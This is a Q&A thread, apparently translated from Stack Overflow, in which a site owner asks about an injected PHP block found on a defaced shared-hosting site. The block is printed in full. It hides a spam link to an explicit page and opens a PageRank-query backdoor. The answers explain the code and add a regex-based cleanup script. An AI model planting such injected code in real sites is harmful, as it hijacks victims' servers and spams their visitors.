My site has received a violation. How to protect yourself from shared hosting?

I have GoDaddy shared hosting and the site got defaced. Who's guilty? The site was created using PHP. Is it possible that a person can go through some vulnerability on my site and change the file? Or is it all server side, meaning GoDaddy was not safe enough?

This is what was entered into the file. What is he doing?

<?php //{{1311051f GLOBAL $alreadyxxx; if($alreadyxxx != 1) { $alreadyxxx = 1; $olderrxxx=error_reporting(0); function outputxxx_callback($str) { $links = '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="rb4d41ca36473534443c002805"><a href="http://www.wcvi.org/community_development/ecogardners/fresh/blow-jobs-teen/blow-jobs-teen.html">blow jobs teen</a><br></div></SPAN>'; preg_match("|</body>|si",$str,$arr); return str_replace($arr[0],$links.$arr[0],$str); } function StrToNum($Str, $Check, $Magic) { $Int32Unit = 4294967296; $length = strlen($Str); for ($i = 0; $i < $length; $i++) { $Check *= $Magic; if ($Check >= $Int32Unit) { $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit)); $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check; } $Check += ord($Str{$i}); } return $Check; } function HashURL($String) { $Check1 = StrToNum($String, 0x1505, 0x21); $Check2 = StrToNum($String, 0, 0x1003F); $Check1 >>= 2; $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F); $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF); $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF); $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F ); $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 ); return ($T1 | $T2); } function CheckHash($Hashnum) { $CheckByte = 0; $Flag = 0; $HashStr = sprintf('%u', $Hashnum) ; $length = strlen($HashStr); for ($i = $length-1; $i >= 0; $i--) { $Re = $HashStr{$i}; if (1 === ($Flag % 2)) { $Re += $Re; $Re = (int)($Re / 10) + ($Re % 10); } $CheckByte += $Re; $Flag ++; } $CheckByte %= 10; if (0 !== $CheckByte) { $CheckByte = 10 - $CheckByte; if (1 === ($Flag % 2) ) { if (1 === ($CheckByte % 2)) { $CheckByte += 9; } $CheckByte >>= 1; } } return '7'.$CheckByte.$HashStr; } function getpr($url) { $ch = CheckHash(HashURL($url)); $file = 
"http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";; $data = file_get_contents($file); $pos = strpos($data, "Rank_"); if($pos === false){return -1;} else{ $pr=substr($data, $pos + 9); $pr=trim($pr); $pr=str_replace(" ",'',$pr); return $pr; } } if(isset($_POST['xxxprch'])) { echo getpr($_POST['xxxprch']); exit(); } else ob_start('outputxxx_callback'); error_reporting($olderrxxx); } //}}75671d8f ?> 
+4
source share
4 answers

Most likely, it was an exploit for a package that you use on your site (for example, phpBB, phpNuke, etc.). People crawl the web looking for vulnerable sites and exploit those that can be exploited. The code is open source and easy to access, so you cannot really protect it other than by using the latest version.

Companies such as PacketStormSecurity easily allow “script kiddies” to find a PoC (Proof of Concept) script, and they take it upon themselves to try it on every site that they can. Some of them are as easy as a crafted Google query to find a list of potential targets.

You can check your logs for the GET URL that led to the exploit, but the best-case scenario is just to stay as up to date as possible, and never rely on your host to restore backups of your site.

+9
source

The real deal with this hack is here: http://frazierit.com/blog/?p=103

No SQL injection, no secret sauce; these guys didn’t listen to wires, or there is an agent on some machine you use that is transmitting your keystrokes, and you used a clear-text FTP password to work with your site. They got FTP access to your site and systematically injected code into the .php and .html pages on your site. They are building a distributed network of page-rank checkers across numerous Internet providers, perhaps to check SEO actions. It is easy to clean: you just need to run a regular expression on the command line.

-Drew

+1
source
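The command-line cleanup mentioned in the answer above, as an added example that is not part of the original answer: a Python script that finds and strips blocks framed like the sample in the question (`<?php //{{<hex> ... //}}<hex> ?>`). It assumes other infected files use the same framing and contain at least one of the sample's names; `strip_injection` and `clean_tree` are names chosen for this example.

```python
import os
import re

# Framing taken from the sample in the question: "<?php //{{<hex> ... //}}<hex> ?>".
# Assumption: other infected files differ only in the hex ids and the payload.
INJECTED = re.compile(
    rb"<\?php\s*//\{\{[0-9a-f]+\s.*?//\}\}[0-9a-f]+\s*\?>\s?",
    re.DOTALL | re.IGNORECASE)
# Names from the same sample; one must occur inside a match so that unrelated
# code that merely uses similar comment markers is left alone.
INDICATORS = (b"outputxxx_callback", b"xxxprch")
EXTENSIONS = (".php", ".html", ".htm")

def strip_injection(data: bytes):
    """Return (cleaned_bytes, number_of_blocks_removed)."""
    removed = 0

    def _drop(match):
        nonlocal removed
        if any(ind in match.group(0) for ind in INDICATORS):
            removed += 1
            return b""
        return match.group(0)  # marker-shaped but no indicator: keep it

    return INJECTED.sub(_drop, data), removed

def clean_tree(root: str, apply: bool = False):
    """Walk root and report infected files; rewrite them only when apply=True."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                original = fh.read()
            cleaned, count = strip_injection(original)
            if count:
                findings.append((path, count))
                if apply:
                    with open(path, "wb") as fh:
                        fh.write(cleaned)
    return sorted(findings)

if __name__ == "__main__":
    import sys
    for path, count in clean_tree(sys.argv[1], apply="--apply" in sys.argv[2:]):
        print(f"{count} injected block(s): {path}")
```

Run it without `--apply` first to get a report, and work on a downloaded copy of the site so the infected originals remain available for comparison.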

The script allows someone to specify the URL of the script using the xxxprch variable. It checks the hash of the URL to make sure it conforms to a specific standard and searches for the Google URL. It then checks to see if the word “rank_” is in the search results and receives the next 9 characters following “rank_” and returns them for display on the user's screen.

If the user does not specify a variable in xxxprch, it automatically writes out links to the page with the explicit website.

Note: If you get a virtual private server (it can be found as cheaply as $3 a month), you can install mod_security, which prevents many of these types of attacks. On the other hand, you will need to keep the OS updated.

0
source

I hate talking about it, but you are to blame. SQL / HTML / JS / code injection is your responsibility. It is also important to choose a strong password. It is possible that anyone can find a vulnerability and do something.

It seems that this code introduces links and somehow gets the Google page rank for some reason.

I think it falls under one of the principles of a pragmatic programmer:

“select” Isn’t Broken: It is rare to find a bug in the OS or compiler, or even a third-party product or library. The bug is most likely in the application.

Replace the OS / compiler / third-party library with shared hosting.

-7
source

Source: https://habr.com/ru/post/1338968/

